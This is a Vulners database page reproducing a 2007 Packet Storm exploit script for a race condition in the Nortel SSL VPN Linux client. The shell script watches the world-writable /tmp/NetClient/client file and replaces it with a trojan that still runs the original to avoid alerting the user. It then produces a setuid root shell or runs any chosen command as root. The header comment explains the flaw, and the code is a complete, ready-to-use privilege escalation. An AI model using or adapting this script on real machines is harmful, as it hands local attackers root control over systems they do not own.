Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

nortel-sh.txt

🗓️ 24 Feb 2007 00:00:00Reported by Jon HartType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Nortel SSL VPN Linux Client race condition allows unprivileged local user to obtain root privileges by exploiting a race condition and insecure file permissions in the client

Code
`#!/bin/sh  
#   
# Nortel SSL VPN Linux Client race condition  
#   
# Jon Hart <[email protected]>  
#  
# The Linux client that is utilized by versions priot to 6.05 of the Nortel  
# SSL VPN appliance suffers from a number of problems that, in combination,  
# allow an unprivileged local user to obtain root privileges.  
#   
# This particular bug is as follows:  
# 1) SSL VPN is initiated from the startNetdirect() javascript call  
# 2) A zip archive is downloaded to the local machine which contains three  
# binaries necessary for the client: askpass, client, and surun. This  
# archive is written to /tmp, chmod'd 777, and then it is extracted into  
# /tmp/NetClient  
# 3) All of these files are chmod'd world writable by the following java  
# snippet, which is called on all UNIX client OSs:  
#  
# protected boolean setPermissions(String file)  
# {  
# String command = "chmod a+xw " + file;  
# try  
# {  
# Process p = Runtime.getRuntime().exec(command);  
# p.waitFor();  
# }  
# ...  
# }  
#  
# 4) /tmp/NetClient/surun is executed, which in turn runs  
# /tmp/NetClient/askpass. This process aquires the root password, and  
# then executes /tmp/NetClient/client via /bin/su and the root password.   
#  
# There is clearly a bug in step 2 and 3 whereby files are installed world  
# writable. The bug I chose to exploit is the race condition in step 4,  
# combined with the insecure permissions of steps 2 and 3, which (IMO),  
# gives root more easily. The risk here is if you have untrusted accounts  
# on the machine from which you access the Nortel VPN, those accounts can  
# easily gain local root access.  
#  
# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear,  
# swap it for our "special version", and wait for a shell.  
#  
# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,  
# but not the vulnerability. The same vulnerability also exists in the Mac  
# client.   
#  
# For education and testing purposes only. Only run this on systems that  
# you maintain/control.  
#  
  
cleanup() {  
rm -f $TMP_DIR/.*-$$\..*  
}  
  
  
run_cmd() {  
CMD=$@   
VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`  
  
echo "Waiting for writable client"  
while (true); do  
if [ -w $CLIENT ]; then  
OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`  
echo "Saving old client"  
cp $CLIENT $OLD_CLIENT   
chmod 755 $OLD_CLIENT  
echo "Writing new \"client\""  
echo "#!/bin/sh" > $CLIENT   
echo "$CMD" >> $CLIENT  
echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT  
# ensure the original client gets run so as to   
# not alert the user  
echo "exec $OLD_CLIENT \$@" >> $CLIENT  
break  
fi  
done  
  
SUCCESS=0  
echo "Waiting for new client to be run"  
while (true); do  
if [ ! -f $VPN_CLIENT_RUN ]; then  
SUCCESS=1  
break  
else  
sleep 2  
fi  
done  
  
if [ $SUCCESS == 1 ]; then  
echo "Success"  
return 0  
else   
echo "Exploit failed!"  
cleanup  
exit 1  
fi  
}  
  
suid_shell() {  
SH_C="sh_c-$$.c"  
  
# write out setuid shell  
cat >> $SH_C << EOF  
#include <sys/types.h>  
#include <unistd.h>  
int main (int argc, char **argv) {  
setuid(0);  
setgid(0);  
execl("/bin/bash", "bash", NULL);  
}  
EOF  
  
# try like hell to get this shell compiled  
SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`  
gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1  
if [ $? != 0 ]; then  
cc -o $SH $SH_C 2>&1 > /dev/null 2>&1  
if [ $? != 0 ]; then  
echo "Compilation of shell failed"  
echo "Trying backup method..."  
run_cmd "cp /bin/sh $SH && chmod 4755 $SH"  
while (true); do  
if [ -u $SH ]; then  
$SH   
cleanup  
exit  
else  
sleep 1  
fi  
done  
echo "Failed"  
cleanup  
exit 1  
fi  
fi  
rm -f $SH_C   
  
run_cmd "chown root:root $SH && chmod 4755 $SH"  
  
# wait for our shell to be chmod'd  
SUCCESS=0  
echo "Waiting for suid shell"  
for sleep in `seq 1 60`; do  
if [ -u $SH ]; then  
echo "Success! setuid shell is $SH"  
SUCCESS=1  
break  
else  
sleep 2  
fi  
done  
  
if [ $SUCCESS == 1 ]; then  
cleanup  
$SH  
else   
rm -f $SH  
echo "Exploit failed!"  
cleanup  
exit 1  
fi  
}  
  
CLIENT="/tmp/NetClient/client"  
  
if [ -f $CLIENT ]; then  
echo "client $CLIENT already exists -- forcing stop"  
$CLIENT --stop  
for sleep in `seq 1 60`; do  
if [ ! -f $CLIENT ]; then  
break  
fi  
sleep 1  
done  
fi  
  
# hack to figure out where temp files get put...  
TMP_FILE=`mktemp -t $$`  
TMP_DIR=`dirname $TMP_FILE`  
rm -f $TMP_FILE  
  
trap cleanup 1 2 3 15  
  
# two modes of operation -- get a root shell, or run a cmd as root.  
if [ -z "$1" ]; then  
suid_shell  
else   
run_cmd $1   
fi  
  
cleanup  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4
nortel vpnssl vpnlinux clientrace conditionroot privilegesexploitinsecure permissionsvulnerability
24